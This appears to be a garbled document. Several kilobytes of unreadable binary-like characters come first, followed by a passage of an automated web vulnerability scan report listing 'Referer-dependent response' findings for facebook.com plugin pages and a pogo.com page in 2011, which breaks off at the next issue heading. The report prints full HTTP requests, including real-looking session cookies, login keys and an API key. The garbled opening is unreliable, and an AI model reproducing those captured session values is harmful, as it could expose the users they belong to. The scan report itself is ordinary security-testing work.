`D...B}.._H...B....vx[.a.`{}....Y~."..~.......2=......A.g.7..\.........zt......W....~.~.........zvY...Q.....5..u..~]M....|...Y.........../_.6.c..Q...yWAcmg..T.9.zO-[C.TM.......r..z>.(...Z.>..h...ua.k-gM...D.2.....*..3..".s.......e.[/......+.}c.._....<...9T....C./-........S1.....&Z..g.3.V.$........J......~.')........T....za4=]?..&<"......u.z3.!N+d*v....,(..|....&..v..Z+.....7 ~3O.+y...h..{5.....rFR...Y...t..d`K.Fy....JW...R...Y*..
.LJ<..4....v.%jG...+.....i.r..T-....K....R..4...<...R.M.%$"....-....k.<....K..G...6a.d......0..TQ......S..M.....xn.F:...B.i._U&M....B..a./.)....R>3...NW....)..^.F^.v.Wx..E...^...92.......[.o..q...)5.9.+.9`.NwR.t...h..ZU.W.D.E}+[.!.A.#....*m.....]_h.. hie.7.d........|.........@...4..]..|..    .....,.>......+U    (...i....d-p...Rg..}.h..
... *..b[/.]..S.vJ.F.]..;....Dt/ p..&..Jk&&.(.z......)d.Y.^..n>...Z~. ...(p8..g.y....q......G.1[*.....3F.l..i...F{,.
>....%..]r.;.V..]O1.S^...H..<...]+._.....-9uU7w.E...1"ME.>.........;...lm.......n.....6...&...[h.LJ.E.[.N.......J..P]....S.4.$......M."...#......Z...R........v>R......z..p..... g..e...0...&U....#T-w.<0{.....o..$..].vox.7.<......-^3......
..!..._..^vWS...Jo.N.pj..Ku+.(....&[..Q........<.........]3m ..X    .x..X&.b1%.`.{..D..K....w..A..B
..*2G6..h.....=.e.0...1....n"WJ./.s..C........!@..m...o+&.
x.Sg....s...G...s^.9o.....[....=...I.-..E.-...5.....{Ko&.+...E.{&.MJ.t.....;o.(3..w...^.....Z..R&......i9.g..^Z]..:..z......?h....!.E..{,...3.&.!f.S#qwQ...I..z8f%(D&.k..H..~..,.._\.....".p.........(.7D Q.=.......0[h*;.^c...xw....B....7.h..a2.].....E2.L....<...e...b.$Vy#Or..'..'....^.......h.k....TNN.'..z........m.|.....#JH...n+....=.8+.=....3........................wu9.nbMK...$.....#.l...M    gd.y..%&Q..........T...`....=#...a..c....!.......+zq.D.->...5......N._'..:....P..v}.W7.    %:
g.......Z6..7.....9..P....^.........H.F....q.o.(.6.\b..(...A..y.0..3..#2. ....2.N...$`!.........:...T.......yBw........i.>....w..Ox1O)UZ..i1G.......]^FY%..{.L..zq......Vj...H;=...k    ....s...U.V.l...y..].,.@.*    ..pj..u^.PQ.J.....vp.........qK.....wWh]...t8..U..S.......5.^..bg.=.tp...>..{.y..<./...Fu(...l..m..{.0....r.)....P-./..I..ZL....i=u=e..."......m"...jAp......S.l.=.9.K^.s..5..V.....X.0G?.w.W...{..t.TG.].......=C,. C.h....%*.:$.(.kl. .`.!.C.+j....[.Ld*.|e?.x3..7CgJ.!.=...6.dO........X...nk...*\.5....#t[.OA.e.nkt...kA..B.mZ...N.7........v......,x...,.z2Z...w.k.B.'...X...E..gW%|vU.........t....9..KOgW...?..q:.....';.';.'...l.';..B...~..4)>R-..n..x...X.......y..!R..<Q.....L.#...E./2E;......v$M.4.#..`..;.........E..S....z.4R|..HS
.q .h.`@........b
'..........Y\..,.y.s..8.bS.=.......%...kNWLpwH.{...    ....Oq..s.(...9!.::y...J..XK<......).L.tz.2...d.Zf....u..r\G9..?vR....'...o.....c..    ...%h..l...ZX\2.....@G.........^..=Q&....l...}.@'...r05....L|d...7..@Xk.s>8.r....9....O....#.P>0\..&j[\...J...6u).x.~B.?.....$<.QQ.......sPXcB2..eI...otW9..5[iY-.Z.K....?%..<...D....,.?.)5...K...|..6)&M..I..-.(.......R..^.9..Y..........3.^..U.^..^......p.w.?....6)E...5......)......B.f...n....^...W..j.ul...{..v.M...{..L.."A....!.Z.....n-#........V2%:....{Too....~3...JF..x..........!..n...............[...B.2.....n..Z.R..ZE...b..fZ4Z
/..
,..fz......,]S."..L.....A.w+....d.I.91#I.....oU..oUP...........X.D..!...J+;.....H..Bn|...R...9....,BfZ.C..<..(>.c ar#8<.....Z.!...0...?....D.:
!...R.Wh.O..]T..3.=...R...8-.^.G...Z/M......y.a..M.COj.4.P.Evx.u.@.4c }J...l    4..6.....jW.T.....;s.VC.i....>
....e..........jv......^.kkn.+....S_z.u...lW..S.+p..yb..{t.".......Mr..C.~......nibPN|......ow..~N.z9.....A......A.u{P.;wB.U..~.......?.w..1....er.F...e.>.elssz._.2......P .f..z.1.1DC.%.-!....zg_....l.4..\..".(f/.R..awb.LV.,{^Y.......!D....!..I.;.P.,........^8..."N...t4......6....6.Jb.......j......y...[$.......b...T4..6.Y.    .......q..."...9.$..B.Nk.R.I..n..v.9b......m....7.].A......T.%...~...].....^...m....1j.E...4.A.E...V7j(...@...7%.s..P+....40_Ci.AC.G.+.....
.6-... k(.8...^>.=q:{g..Oh(.......])..])h...........C+@..}.3G.*.X0.....0.}.x....9.yz.}H..'.G    .....l..........?...'.o....whb....A...3....z...y....G...M.D.?...l.'..B..m..}H_?..1{. Z.. .Rh.W.z.=.Ao-n....*..:.#,.T.....6jb........_..}...Fm......~^.....B7.kj..../......W.L.+`.(..F.....W............_r.....=.nE..V...-...d.b.:?a......]....H...?.@n...r.i..q.2.........;..8.u].Y....n6!.v......K3.a..x!y...*=.....Y.&8....pk...yiI!...d. ..."!.'./+.....oP.%..7.....z]3.rr.-}....^.L;.J.....2N...)(6d.v^{+......]wl.9(]....>.P.I....z.Yv:..7.v..u..B.. ..0.{....P.|......"...?.D...g........ ....Qo....?....qBy......t*z...........{gl...Gx........Q.
f.....3..N.{.....Rh..h?..v^...j.....|J.\.*.E....cc.f?.2U..W9e.'.Yg.l...m..pi......]......|..~.i...{9#p~..i.T..^.. .q.Y.......P
.WV.{.....4#V+{.=].p.5.]./.G{.=]c...m%d.?R...*M.rV..Uv.!.......&..L..~...~.....`4.w....IOZ../.$p..\..i.....U<............`....N...S,.`B...1..0'i...E...8..P...t2...H.........6..L..z.8...s.k...........}....5........4....)...M...l...s..~AS.[~X........?.A..0Ay!h."aM.Z.S..K......<7......Z9U........-8.....z'k`~...9i../...w.)..0._.wh..=..6N.u.....x=#4..)....."..fO{N..n..v].2..".d...D_..l`...A.....D....Y..G4}.    Yn~.
.)...7.e.1..F......t.@.St.Rw.    ......7.r>....6.....y..%v.?f.o.......X.R..h=~..G\:.=F/..........

C./h.Yd.*)...zyx.1.XW..t.v.|......v
EBx.* .+~....7........
..... ......oJ.VmZU.OC-.o..wr0_..Ha...Y.....&...h=...k..T.....a..$....5q.f..fk\i.(....4lP...fA..vJ........,..8X.T.a..D......T.-h.Z. .9.d?R4........4J..@:.".x.-/.~8.....9E["9.
...h.Y.B.5..).{^..]<........G....u{...A+..O;Ff.@.JJ......t...kjY....,KC..-Nz!%.S..N*Rvp...zc..`..[*.!....^..XBF...Yo.n))`......{J.o...P.L....;...~"......x...@y...dL.u...@....oTR''.....R\?|...$.=...)I.~.....+X2.j..{..L_.v...C:/......O(.1..f.z.V..A...._*1...M..j.    ....L...Y(..cl...N.Z........le.......S.....eZ p......{....S...RP.:.%.f...ST.*......1k`.[..G.A.b6^..v.......kvc...qp.
.G..@V6q...@c.45...?.l....)w..w..9.....,_t..w..w.....E*.&.P.M.'....`Wn..>.....=.#S0...3px.....b...b..."b-E.&g.*.!b..........T. !.={....4.....)(.6r./|.m.'^aI..C....w....n....L4.".m)....m....1.....i8X.I...L.t...i....vw qw 2.Nq..4{d.....-..I.q.&q.&2...
$f."w........m...m....#3(nF 1#...K.......&Z~.>q.>r.V.#...o...z..=......1o.....k.>..Uy?..Pm.aZ...M...T/.@L........}.,)p..g..[.r..+~l..3...Y...<~]..&....y.c.O^'.l..[.....)8....P.Y....t|z&.%..p.....~R-........!........nV...Y...._..&.C..gn...|f~.hK.$q.p....'..?.'>.G>..........'>.G>._.........~{.#.S.._....#{....'..#.....'v.#{....'..!..g..T.|.f...;.."C->e..Zi.../.fZ.#...#......LJ....o
%.LB<R..)}J'....~.A....`..    j...q[,t.oR+..<....X.Rc...._.._.M......e#....}..F%....s.b.]I......
*ho..Z..H....ja}.q.7..i....T.._...._....D..$s.|..s.....s.|.%.9[.?......mr..".`P.8..P.b...fs.]......&....^&*.....?>..r.>
...[SNIP]...

13. Referer-dependent response previous next
There are 4 instances of this issue:

http://www.facebook.com/extern/login_status.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/like.php
https://www.pogo.com/action/pogop/welcome.do

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defenses are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.

13.1. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Request 1

GET /extern/login_status.php?api_key=ca44798cf7067942a82579c2c720f7dd&extern=0&channel=http%3A%2F%2Fwww.pandora.com%2Ffacebook%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/?ext_reg=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sun, 09 Jan 2011 02:38:39 GMT
Content-Length: 1106

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"pandora.com","channel":"http:\/\/www.pandora.com\/facebook\/xd_receiver.htm","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":"http:\/\/www.pandora.com\/?ext_reg=1","session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>

Request 2

GET /extern/login_status.php?api_key=ca44798cf7067942a82579c2c720f7dd&extern=0&channel=http%3A%2F%2Fwww.pandora.com%2Ffacebook%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sun, 09 Jan 2011 02:39:12 GMT
Content-Length: 1072

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"pandora.com","channel":"http:\/\/www.pandora.com\/facebook\/xd_receiver.htm","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":null,"session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>

13.2. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Request 1

GET /plugins/activity.php?site=pogo.com&width=310&height=166&header=false&colorscheme=light&font=verdana&recommendations=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%253Fext_reg%253D1%26extra_2%3DUS; wd=200x40

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sun, 09 Jan 2011 02:36:52 GMT
Content-Length: 8070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="u061213_1" class="fbConnectWidgetTopmost " style="height:164px; width:308px; font-family:"verdana", sans-serif;"><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="pogo.com" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_1" value="http://www.pogo.com/" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge"><input value="Sign Up" type="submit" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance("u061213_1").login();"><b>log in</b></a> to see what your friends are doing.<img class="fbSocialWidgetTrackingPixel img" src="/campaign/impression.php?campaign_id=137675572948107&partner_id=pogo.com&placement=activity&extra_1=http%3A%2F%2Fwww.pogo.com%2F&extra_2=US" /></div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u061213_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"></div><img class="fbLoadImg img" src="http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div></div><div class="fbConnectWidgetFooter"><div class="fbFooterBorder"><div class="UIImageBlock clearfix"><a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=3" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a><div
...[SNIP]...

Request 2

GET /plugins/activity.php?site=pogo.com&width=310&height=166&header=false&colorscheme=light&font=verdana&recommendations=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%253Fext_reg%253D1%26extra_2%3DUS; wd=200x40

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sun, 09 Jan 2011 02:38:27 GMT
Content-Length: 7945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="u070712_1" class="fbConnectWidgetTopmost " style="height:164px; width:308px; font-family:"verdana", sans-serif;"><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge"><input value="Sign Up" type="submit" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance("u070712_1").login();"><b>log in</b></a> to see what your friends are doing.<img class="fbSocialWidgetTrackingPixel img" src="/campaign/impression.php?campaign_id=137675572948107&partner_id&placement=activity&extra_2=US" /></div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u070712_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"></div><img class="fbLoadImg img" src="http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div></div><div class="fbConnectWidgetFooter"><div class="fbFooterBorder"><div class="UIImageBlock clearfix"><a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=3" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a><div class="UIImageBlock_Content UIImageBlock_ICON_Content"><div class="uiTextMetadata"><span><a class="uiLinkSubtle" target="_bl
...[SNIP]...

13.3. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fwww.cmsinter.net%2Fblog%2F%3Fp%3D366&layout=standard&show_faces=yes&width=450&action=like&colorscheme=light&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cmsinter.net/blog/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sun, 09 Jan 2011 01:43:44 GMT
Content-Length: 9524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d2912d09bf4a5069498090" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Let CMS Custom build your small business a killer server!</b><span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 3 others like this.</span><span class="connect_widget_not_connected_text">3 likes. <img class="fbLikeButtonTrackingPixel img" src="/campaign/impression.php?campaign_id=137675572948107&partner_id=cmsinter.net&placement=like_button&extra_1=http%3A%2F%2Fwww.cmsinter.net%2Fblog%2F&extra_2=US" /><a href="/campaign/landing.php?campaign_id=137675572948107&partner_id=cmsinter.net&placement=like_button&extra_1=http%3A%2F%2Fwww.cmsinter.net%2Fblog%2F&extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Ad
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fwww.cmsinter.net%2Fblog%2F%3Fp%3D366&layout=standard&show_faces=yes&width=450&action=like&colorscheme=light&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sun, 09 Jan 2011 01:44:59 GMT
Content-Length: 9363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d29131b5a04e4d83479319" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Let CMS Custom build your small business a killer server!</b><span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 3 others like this.</span><span class="connect_widget_not_connected_text">3 likes. <img class="fbLikeButtonTrackingPixel img" src="/campaign/impression.php?campaign_id=137675572948107&partner_id&placement=like_button&extra_2=US" /><a href="/campaign/landing.php?campaign_id=137675572948107&partner_id&placement=like_button&extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Er
...[SNIP]...

13.4. https://www.pogo.com/action/pogop/welcome.do previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.pogo.com
Path:	/action/pogop/welcome.do

Request 1

GET /action/pogop/welcome.do?intcmp=cp_10price_1110_roomsel_text HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/game/game.jsp?site=pogo&game=scrabble&lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.&init=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Location: https://www.pogo.com/action/pogop/lightregview.do
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 02:29:22 GMT
Server: Apache-Coyote/1.1

Request 2

GET /action/pogop/welcome.do?intcmp=cp_10price_1110_roomsel_text HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Location: https://www.pogo.com/login/entry.jsp?site=pogo&redr=https%3A%2F%2Fwww.pogo.com%2Faction%2Fpogop%2Fwelcome.do%3Fintcmp%3Dcp_10price_1110_roomsel_text
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 02:30:23 GMT
Server: Apache-Coyote/1.1

14. Cross-domain POST previous next
There are 5 instances of this issue:

http://blog.pandora.com/pandora/archives/2007/07/
